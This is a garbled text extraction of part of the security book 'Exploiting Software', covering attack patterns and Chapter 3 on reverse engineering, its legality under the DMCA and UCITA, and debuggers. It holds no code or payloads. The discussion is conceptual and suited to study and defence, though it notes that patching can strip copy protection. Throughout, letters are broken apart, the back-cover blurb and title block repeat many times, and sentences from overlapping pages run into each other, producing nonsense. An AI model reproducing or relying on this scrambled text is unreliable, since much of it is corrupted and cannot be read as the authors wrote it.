How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Conclusion I n t his chapt er w e p r ovided a shor t int r oduct ion t o at t ack pat t er ns and d iscussed a st an dar d pr ocess b y w hich an at t ack is car r ied out . Our t reat m ent here is ver y high level. I f you n eed m or e infor m at ion on t he basics, ch eck ou t som e of t he r efer en ces w e cit ed. Lat er chapt er s •div e m or e deep Table s amin at ion of t echnical d et ails. Most of t he r emain der of t his b ook ly ofintContent o an ex •is dev ot ed t oI ndex un derst and ing par t icular exp loit s t hat fit wit h in ou r at t ack pat t er n t ax onom y. Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Chapter 3. Reverse Engineering and Program Understanding •

Table of Content s

er act w it h com pu t er pr ogr am s at a sur face level, ent er ing in put and eager ly •Most people Iint ndex (Expl im pat ient ly ?! a) reawHow ait ing response. The pub lic f açade of m ost p rog ram s m ay b e fair ly t hin, oit ing Softw to Brae ak Code bu t m ost p rog r ams go m uch deeper t han t h ey ap pear at fir st glance. Pr ogr am s hav e a By Gr eg Hoglund , Gar y McGr aw pr epond er ance of g ut s, w her e t he r eal f un happ en s. These gut s can be ver y comp lex . Ex ploit ing soft w ar e u su ally r equir es some lev el of und er st and ing of sof t w ar e gut s. Pub lish er: Addison Wesley Dat February 17, 4 sk ill of a p ot ent ial at t ack er is t he ab ilit y t o un rav el t h e ThePub sing lee: most imp or200 t ant com plex it ies0- of t ar get I SBN: 20 1786 95 -8soft w ar e. This is called r ev er se engineering or som et im es just r ev er sing . Sof Pages: 51 2t w are at t acker s ar e gr eat t ool user s, bu t ex ploit ing soft w ar e is not m agic and t her e ar e no m agic soft w ar e exp loit at ion t ools. To br eak a non t r iv ial t ar g et pr ogr am , an at t ack er mu st m anipu lat e t he t ar g et soft w ar e in unu su al w ays. So alt houg h an at t ack alm ost alw ays in volv es t ools ( disassem blers, scr ipt ing engines, inp ut g en er at or s) , t h ese t ools t end t o be f air ly basic. Th e r eal sm ar t s r em ain t h e at t acker 's pr er ogat iv e.

How sofint w eak ?t he Howbasic do at t acker w ar emp br teak p ur pose? are w ho Whend oes at t ack g are sof tbr w are, idea is tso m grake ok tsof h e tassu ionson m ade by t heWhy people fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad uyits? creat ed t he sy st em and t hen und er m ine t h ose assum pt ion s. ( This is pr ecisely w hy it isgcr ical What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. t o id en t ify as man y assu mp t ions as p ossible w h en designing and cr eat in g sof t w are. ) Rev er se engineer in g is an ex cellent ap pr oach t o fer r et in g ou t assum pt ions, especially im plicit Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of[ 1] r eal at t ack s, at t ack pat t er ns, t ools, an d assu m pt ions t h at can be lev er aged in an at t ack . t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack[ 1], yAou m uat st Micr fir stosoft learr elated n h owanr eal at t acks are really carr ied t . w ho made use of the w or d fr iend anecdote involving a successful attou acker " assum e" to find interest ing places to attack in code. Unsuspecting developers assumed t hat w r iting about

This m h ave book ay shock ou—and it will cer educat e y ou. Get t ingthrbey ond t hefor w ust hat -t hey assum ed m w ould be OK.yThis is a sociallev el attt ainly ack patter n. Similar sear ches ough code XXX, FI X,moren TODO also in t end to w or k. ing book s, you w ill learn abou t scr ipt BUG, k id die t r eat t f ound m any hack Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Into the House of Logic I n som e sense, pr ogr am s w rap t h em selv es ar ound v aluable d at a, m ak in g an d en for cin g ru les abou t w ho can g et t o t he d at a and w hen. The v ery ed ges of t he p rog ram are ex posed t o t h e •out side w or ld Table Content ju stoft he w ays t he int er ior of a h ouse has d oors at it s p ublic edg es. Polit e u ser s •go t hr oug h t Ihese ndex d oor s t o g et t o t he dat a t hey n eed t hat is st ored inside. These ar e t he ent r y Expl oitsing How to Br e akoblem Code is t h at t h e v er y door s u sed by p olit e com p any t o access point intSoftw o sofat re w ar e. Th e pr soft e ar e also by r emot e at t acker s. By Grw egarHoglund , Gar y used McGr aw Con sider , f or exam ple, a ver y comm on k ind of I n t ern et - relat ed sof t w are door , t he TCP/ I P lish er: Addison Wesley por tPub . Alt h ough t h er e ar e m any t yp es of d oors in a t y pical pr ogr am , m any at t ack ers fir st look Pub Dat 17, ing 200 4TCP/ I P p ort s is sim ple u sin g a por t - scanning t ool. Por t s p r ovide for TCP/ I Pe: pFebruary ort s. Find SBN: 0- 20 786t95 pu blic Iaccess t o1-sof w -8 are pr ogr am s, but find ing t he d oor is only t h e beginn in g. A t y pical pr ogr am is com Pages: 51 2 plex , lik e a house m ade up of man y r oom s. The best t r easur e is usually f ound bu ried deep in t he h ouse. I n all b ut t he m ost t riv ial of exp loit s, an at t ack er m ust n avigat e com plicat ed pat h s t hr oug h p ublic d oors, j our ney in g deep int o t he sof t w are house. An un fam iliar house is lik e a m aze t o an at t acker . Successfu l nav igat ion t hr oug h t his m aze r en der s access t o d at a an d som et imes com plet e cont r ol ov er t he sof t w are p r ogr am it self . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Soft war e is a set of inst r uct ions t h at det er m in es wh at a gener al- pur pose com put er w ill d o. fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Thu s, in som e sen se, a soft w ar e pr ogr am is an inst an t iat ion of a par t icu lar m ach ine ( m ade u p What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. of t he com pu t er and it s inst r uct ions) . Machin es lik e t his ob viou sly h ave ex plicit r ules and w d ief ined avior h oughwwiteh can watles ch of t h is behav ior s,unf wet er runs, n at ools, pr ogran amd on a Exellp lo t in g Sboeh ft w a re .isAlt loaded ex amp r eal at t ack atold t ackaspat m achine, lookin g at t he cod e and comin g t o an und er st and ing of t he inn er w ork ings of a t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om pr ogr am som et imes t ak es m or e ef for t . I n som e cases t he sou rce code for a pr ogr am is at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . av ailab le for u s t o ex am ine; ot h er t im es, it is n ot . Ther efor e, at t ack t ech niques m ust not alw rely on hav ingmsour ce codye.ou—and I n f act , itsom at ttack t echn iq ues e Get v alu ablebey r eg ar dless Thisays m ust - h ave book ay shock wille cer ainly educat e y ar ou. t ing ond t he of tscr heipt availabilit y of sour ce cod e. Ot her t echniq ues can act u ally r econst ru ct t h e sou rce code k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t fr om t he m achine inst r uct ions. Th ese t echniq ues ar e t he f ocu s of t his chap t er. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

Reverse Engineering When net w or k secur it y m ech anisms do n ot w or k Rev erAt set ack engineer g is t he pr ocess of cr eat ing a b lu ep rin t of a mach in e t o d iscern it s r u les by pat t erinns looking only at t h e m ach ine and it s behav ior . At a h ig h lev el, t his pr ocess in volv es t ak in g engineer in gnot com plet ely un der st an d t echn ically w hen you st ar t , an d com ing som etRev h in er g se t hat you m ay t o und er st and comp let ely it s fun ct ion , it s int er nals, and it s const r uct ion. A good r ever se Classic at tpt acks soft w ails ar e of soft w ar e, w hich b y necessit y inv olves engineer at t em s t oag unainst derstserv an der t he det un derst an ding how t he ov er all com pu t ing machin er y t h at t h e soft w ar e r uns on f un ct ion s. A Sureng pr ising t acks agaainst t softan war e of bot h t h e har dw ar e and t he soft w ar e, and r ev er se ineeratrequ ir es deepclien un derst ding how it all w or k s t oget her . Tech niqu es f or cr aft ing m aliciou s inpu t Think about how ex t ern al inp ut is hand led by a soft w ar e pr ogr am . Ex t er nal " u ser " in put can The t echn ical det ails of b uf fer ov er f low s cont ain comm and s and dat a. Each cod e pat h in t he t ar g et inv olv es a num ber of cont r ol decisions t hat are mad e based on inp ut . Som et im es a code pat h w ill b e w id e and w ill allow Root k it s any n um ber of m essages t o pass t h rou gh su ccessf ully. Ot her t im es a cod e pat h w ill be nar owi t,inclosing n orwitev ing if t he inps,utand isn'kn t f ow or m at t ed ex act ly tyhe Ex pr lo g S o fttwh ings a re isd ow f illed h en t h eh alt t ools, con cept ledg e necessar t o rbight reakw ay. Figur e 31 This ser ies of t w ist s and t u rn s can b e m apped if you hav e t h e r ig ht t ools. soft w ar e. illust rat es code pat hs as fou nd in a comm on FTP serv er pr ogr am . I n t his diag ram , a comp lex subr out in e is being m apped. Each locat ion is show n in a box along w it h t he cor r espon ding m achine inst r uct ions.

Figu r e 3 - 1 . This gr aph i ll ust r a t e s cont r ol fl ow t h r ou gh a subr ou t i ne in a com m on FTP ser v er . Ea ch bl ock i s a se t of in st r uct ion s t h at r u ns

a s a gr oup, on e in st r uct i on a f t e r t h e ot h er . Th e li ne s be t w ee n boxe s il lu st r at e t h e w a ys t ha t cont r ol i n t h e code con ne ct s boxe s. Th e r e a r e va r iou s "br a nch es" be t w ee n t h e boxe s t h at r e pr ese nt de cision poi nt s i n t h e cont r ol fl ow . I n m a ny ca ses, a de cision r e ga r din g h ow t o br an ch ca n be i nf lu en ce d b y dat a su ppl ie d b y an a t t a ck e r . •

Table of Content s



I ndex

[ View full size im age]

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Gener ally sp eak ing, t he d eeper y ou go as you w and er in t o a pr ogr am , t h e longer t h e cod e Ex t in S otfthe w inpu a re is f illed h t"hsteart t ools, s, and kn ow ledg e necessar t o tboreak patphlobiet wgeen t w h er ewit y ou " andcon t hcept e place w here you end up . Get tying a soft ar e. locat ion in t h is house of logic r equir es follow ing pat h s t o v ar ious r oom s ( hop ef ully par twicular w her e t he v aluab les ar e) . Each int er nal d oor y ou p ass t hr ough im poses r ules on t h e k in ds of m essages t h at m ay pass. Wan derin g f r om r oom t o r oom t hus in volv es negot iat ing m ult iple set s of ru les r egar ding t h e inpu t t h at w ill b e accept ed. This m akes cr aft ing an inp ut st r eam t hat can pass t hr oug h lot s of door s ( bot h ex t er nal and int er nal) a r eal ch alleng e. I n gener al, at t ack inp ut becom es pr ogr essiv ely m or e r efined and specif ic as it d ig s deeper int o a t ar get pr ogr am . Th is is pr ecisely w h y at t ackin g sof t w are r equ ir es m uch mor e t h an a simp le br ut efor ce app r oach . Simp ly blast ing a p rog ram w it h r and om inpu t alm ost n ev er t r aver ses all t he code p at hs. Thu s, man y possib le pat h s t hr oug h t he hou se rem ain u nexp lored ( and

un ex ploit ed) by bot h at t ack ers and defend er s.

Why Reverse Engineer? Rev er se engineer in g allow s y ou t o lear n ab out a pr og ram ' s st ru ct ur e and it s logic. Rev er se engineer in g t hus leads t o cr it ical in sig ht s r egar ding how a pr og ram fun ct ion s. This k ind of •insight is extTable of Content r em ely u sef uls w hen y ou ex ploit sof t w are. Th er e ar e obv ious ad van t ages t o be •had f rom revI ndex er se engin eer ing. For ex am ple, you can lear n t he k ind of syst em f unct ions a Expl oit ing Softw a reisHow to BrYou e ak Code t ar get p r ogr am using. can learn t h e files t he t arg et pr ogr am accesses. You can lear n t he pr ot ocols ,tGar he yt ar getawsof t w ar e uses and how it comm u nicat es w it h ot h er p ar t s of t he t arg et By Gr eg Hoglund McGr net w or k. Pub lish er: Addison Wesley

The m ost pow er f ul ad van t age t o r ev ersing is t h at y ou can chan ge a pr ogr am' s st r uct ur e an d Pub Dat e: February 17, 200 4 t hu s dir ect ly af fect it s log ical flow . Tech nically t his act ivit y is called pat ching, b ecau se it I SBN: 0- 20 1- new 786 95code -8 inv olves p lacing pat ches ( in a seamless m anner ) ov er t he or igin al code, m uch lik e a Pages: 51 2 pat ch st it ch ed on a blank et . Pat ching allows you t o add comm an ds or chan ge t h e w ay par t icular f unct ion calls w or k . This enab les y ou t o ad d secret feat ur es, r em ov e or disable fu nct ions, and f ix secur it y bu gs w it hou t sour ce code. A com m on use of pat ching in t he com put er u nder gr ound inv olves r em oving copy p r ot ect ion m echan ism s. Lik e any ill,t w rev erse engin eer ing b e used f or good f oreak bad How d oessksof are br eak ? How do can at t acker s m ake sof t w and ar e br onends. p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Should Reverse Engineering Be Illegal? Becau se rev er se engineer in g can be used t o reconst r uct sour ce code, it walk s a fine line in int ellect ual pr oper t y law . Many sof t w ar e license agr eem ent s st r ict ly for bid r ev er se engineer in g. Sof t w ar e com p anies fear ( and r ight ly so) t hat t heir t r ade secret alg or it h m s and •m et hods w illTable Content s ly r ev ealed t h rou gh rev erse engin eer ing t han t hey ar e t h rou gh b e mofore direct •ext er nal machin I ndexe obser v at ion. How ev er , t h er e is n o g en er al- pu rp ose law against r ev er se Expl oit ing in Softw engineer g. a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Becau se rev er se engineer in g is a cr ucial st ep in rem ov in g cop y pr ot ect ion schemes, t h er e is som e con fu sion r eg ard ing it s leg alit y . Pat ch in g sof t w ar e t o d ef eat copy p rot ect ion or digit al Pub lish er: Addison Wesley r ight s man agement schemes is illeg al. Rev er se engineerin g sof t w are is not . I f t he law Pub Dat e: February 17, 200 4 chang es and rev er se engin eer ing is m ade illeg al, t hen a ser ious blow w ill be d ealt t o t he I SBN: 0- 20of 1- 786 com mon user soft95w-8ar e ( especially t he com m on and cur ious user ) . A law com plet ely 51 2 se en gineer ing w ould be lik e a law mak ing it illegal t o open t he h ood of y our out lawPages: ing r ever car t o repair it . Un der such a syst em , car users w ou ld b e r eq uired by law t o g o t o t he dealership for all r ep air s an d maint en ance. [ 2] [ 2]

Although this m ay not sound so bad t o y ou, note that su ch a law m ay w ell make it illegal for any " nonaut hor ized" mechanic t o wor k on your car as well.

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ewwar alls, ru sion det ectrev ionersy em s, andinant war n oteem k eep outmtany he bad g uys. s? Soft e vint endor s f or bid sest engineer g iniv tirhus eir soft licen seeagr entinsgf or r eason What t ools can be ur sed t o beng reak softing wardoes, e? Th in is book p rov he answ s. secr et m et h ods. On e reason is t hat ev erse in eer f act , m or eides obv tiously rever eal But all t his is a bit silly , r eally . To a skilled r ev er se engineer, looking at t he b inar y m ach ine Ex p loof i t in o ftam w ais rej is w itas h ex amp r ealce at code. t ack s, So at t tack pat tet er ns, t ools, d , but code a g prS ogr ustloaded as g ood hav ingles t heofsour he secr is alr eadyan out tinechniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om t his case only specialist s can " read" t he cod e. Not e t hat secr et m et hods can be d ef ended , y means ou m u stotfir st tlear eal really carr t . b ut sp ecialist s in com piled tat hrt ack ou gh her hannathtow em rpt in gatttoacks hideare t hem fr om evied ery ou one code. Pat ent s ex ist specif ically f or t his p ur pose, and so does copy r ight law . A g ood ex am ple This m ustly - hpr ave book shock ou—and it will e ion y ou. Get titing ondain. t heTo of pr oper ot ect in gma ay pr ogr am ycan be f oun d in cer t het ainly dat a educat encr y pt algor hmbey s dom scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t be accept able as act u ally usef ul an d pow er f ul, encr yp t ion algor it h ms mu st be p ublished for t he cr y pt og rap hic w or ld t o evaluat e. How ev er , t h e inv en t or of t h e algor it hm can main t ain r ight sWhy t o t hsof ew . Su w as e case w itt oh be t h ea popu lar RSA encr y pt ion schem e. Also not e t work ar e ex ch ploit w illt hcon t inue ser ious p r oblem t hat alt hou gh t his b ook is cop yr igh t ed, y ou are allow ed t o r ead it and un derst an d it . I n f act , y ou' reWhen encour ag do so. net wed or kt osecur it y m ech anisms do n ot w or k Anot hAt ert ack reason hat pat tter ns sof t w ar e vend or s w ould lik e t o see r ever se en gineering m ade illegal is t o pr event r esear ch er s f r om find ing secur it y f law s in t h eir code. Quit e oft en secu rit y r esear chers fin d f law t w are and Revserinsesof engineer in g repor t t hem in pu blic for um s lik e bug t r aq. Th is mak es soft w ar e v en dor s look bad , hu rt s t heir imag e, and dam ages t h eir r eput at ion as upst and in g sof t w ar e v en dor s. ( I t also t endag s ainst t o m ak e soft w arwe ar imepr ov e at t he sam e t ime. ) A w ell- est ablish ed Classic at t acks serv er soft pr act ice is for a secur it y specialist t o r epor t a flaw t o t he vend or and giv e t hem a r easonab le ising at t tacks agg ainst soft war e is m ade p ublic. Not e t h at du r in g t his gr ace gr aceSur perpr iod t o fix he bu b ef orclien e it st exist ence per iod t he flaw st ill ex ist s for m or e secr et ive secur it y specialist s ( including b ad g uy s) t o Tech cr aft ingin m aliciou t t hen r esear chers w ill be pr event ed f rom usin g exp loit . I f niqu r ev eressef or engineer g is madse inpu illegal, a cr it ical t ool f or evaluat in g t he qu alit y of cod e. Wit hout t he abilit y t o ex am in e t he st r uct u re echn ical will det ails of ced b uf fer of softThe w arte, users b e for t o tov aker e ftlow he svend or' s w or d t hat t he soft w ar e is t r uly a qu alit y [ 3] pr odu ct . Keep in m ind t hat no v en dor is cur r en t ly held f inancially liab le for failur es in it s Root k it s soft w ar e. We can t hus t r ust t h e vend or 's w or d regar d in g qualit y as f ar as it imp act s t heir bot omi t in line er ) . wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Ex pt lo g S( and o ft wnaorefar ist hf illed soft w ar [ 3] e. Note that many consum er s alr eady k now that they ar e being sold poor -qualit y softw are, but some con sum er s remain confused about how m uch quality can actually be attain ed in softw ar e.

The D igit al Millennium Copy r ight Act ( DMCA) ex plicit ly ( an d con t r over sially ) add r esses r ev er se eng ineer ing fr om t he per spect iv e of copy r ig ht in fr ing em ent and sof t w ar e crack ing. For an int erest ing v iew of h ow t h is law imp act s indiv idual lib er t y , check out Ed Felt en' s Web sit e at ht t p: / / w w w . fr eedom t ot in ker . com . When y ou p ur chase or inst all soft w ar e, y ou are t yp ically pr esent ed w it h an end - user license

agr eem ent ( EULA) on a click - t hr oug h scr een. This is a legal agr eem ent t hat you ar e asked t o r ead an d ag ree t o. I n m any cases, sim ply p hy sically opening a sof t w are packag e cont ainer , such as t he b ox or t h e disk en velope, im plies t hat you h ave ag reed t o t h e soft w ar e license. When y ou d ow nload sof t w ar e on- line, y ou are t yp ically asked t o p r ess " I AGREE" in r espon se t o a EULA docum ent disp layed on t he Web sit e ( w e w on't get in t o t he secur it y r am ificat ions of t his) . Th ese ag reement s usually cont ain langu age t h at st r ict ly p roh ibit s r ever se en gineer ing . How ev er , t hese agr eem ent s m ay or may not hold u p in cour t [ Kaner an d Pels, 199 8] . •

Table of Content s

The Unif orm Com put er I n for m at ion Tr ansact ions Act ( UCI TA) poses st ron g rest r ict ions on • I ndex r ev er se eng ineer ing and m ay be used t o help " click t hr oug h" EULA's st an d- up in cou rt . Som e Expl oit ing Softw a re How to Br e ak Code st at es hav e adop t ed t h e UCI TA ( Mar y lan d and Virg in ia as of t h is w rit ing ) , w hich st ron gly By egsHoglund , Gar yy McGr aw er se engin eer legally. affGr ect you r abilit t o rev Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Reverse Engineering Tools and Concepts Rev er se engineer in g fuels ent ir e t ech nical indu st ries and p aves t h e w ay for com pet it ion. Rev er se engineer s w ork on h ard p rob lem s lik e int egr at ing soft w ar e w it h pr opr iet ar y p rot ocols and code. They also ar e of t en t ask ed w it h un rav elin g t he m y st er ies of new pr odu ct s released •by com pet it or Table of Content s. The b ooms in t he 19 80s of t he PC clone m ar ket was heavily dr iv en b y t he •abilit y t o revIerse ndex engin eer t h e I BM PC BI OS sof t w are. Th e same t rick s hav e been ap plied in Expl Softw a ree How to Br eind ak ust Code t he oit seting - t op gam console r y ( w hich in clud es t he Sony Play St at ion , for ex am ple) . Chip m Gr anuf ur ers Cyr ix anaw d AMD h ave r ever se en gineered t he I n t el micr opr ocessor t o release By eg act Hoglund , Gar y McGr com pat ible chips. Fr om a legal perspect iv e, r ev er se engineer in g w or k is d anger ous b ecause it skirPub t s tlish h eer:edges of t h e law. New law s su ch as t h e DMCA and UCI TA ( w h ich m any secu rit y Addison Wesley analy st s decry as eg regiou s) , put heav y r est r ict ion s on rev er se engin eer ing. I f y ou are t ask ed Pub Dat e: February 17, 200 4 w it h rev er se engin eer ing sof t w ar e leg ally , y ou need t o und er st and t h ese law s. We ar e not 1- 786 95 -8 going tIoSBN: dw0ell20on t he legal asp ect s of r ever se en gineer ing b ecause w e ar e not legal ex pert s. Pages: 51 2 Suf fice it t o say t hat it is v er y imp ort ant t o seek legal coun sel on t h ese m at t er s, esp ecially if y ou r epr esent a com pan y t hat cares ab out it s in t ellect ual p rop er t y .

The Debugger

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? A d eb ugg er is a soft w ar e p rog ram t hat at t aches t o and con t r ols ot her soft w ar e pr ogr am s. A What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. debu gger allow s single st epping of code, d eb ug t r acing , set t ing br eak point s, and v iew ing vEx ariab at e in twhe p rles ogrof am as at it tex ecu est ack in a pat st ep ash ion. p lo iles t in an g Sdom ftem w aory re isstloaded it ht ar exget amp r eal ack s, tat t erwise ns, tfools, an d Debu gger s ar e inv alu able in det erm ining logical p rog ram flow . Debu gger s fall in t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t wt oart ewo fr om cat egor an dn khern m od debug User - mied ode er s r u n lik e nor m al at t ack , ies: y ou u mser u st- m firode st lear ow elr eal at teacks aregers. really carr oudebugg t. pr ogr am s un der t he OS an d ar e sub ject t o t he sam e r ules as nor m al p rog ram s. Th us, userm odemdust eb-ugg er sbook can only her userpr ocesses. A kere neldebu gger p art This h ave m ay debu shockg yotou—and it lev willelcer t ainly educat y ou.mod Get et ing bey ond ist he of t he OS an d can debu g d ev ice dr iver s and even t he OS it self . On e of t he m ost popu lar scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t com mer cial ker 